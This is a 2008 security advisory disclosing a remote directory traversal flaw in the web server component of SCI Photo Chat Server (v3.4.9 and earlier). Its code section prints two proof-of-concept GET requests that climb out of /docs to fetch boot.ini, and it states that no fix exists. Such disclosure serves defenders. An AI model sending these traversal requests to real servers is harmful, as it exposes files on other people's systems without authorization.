#######################################################################

                             Luigi Auriemma

Application:  SCI Photo Chat Server
              http://www.simmcomm.ch/scichatinst
Versions:     <= v3.4.9
Platforms:    any supported by Java
Bug:          directory traversal
Exploitation: remote
Date:         19 Feb 2008
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


SCI Chat is a Java based chat server.


#######################################################################

======
2) Bug
======


SCI Chat listens on two TCP ports: 1234 for the Java chat and 1235 for
the web server used for allowing the clients to load the Java applet.

This web server is affected by a classical directory traversal
vulnerability exploitable with both slash and backslashes plain
delimiters which can allow an attacker to download the files from the
disk on which is located the SCI Chat server.


#######################################################################

===========
3) The Code
===========


GET /docs/..\..\..\..\..\boot.ini HTTP/1.0
or
GET /docs/../../../../../boot.ini HTTP/1.0


#######################################################################

======
4) Fix
======


No fix.
Anyway the server seems no longer supported by many time.


#######################################################################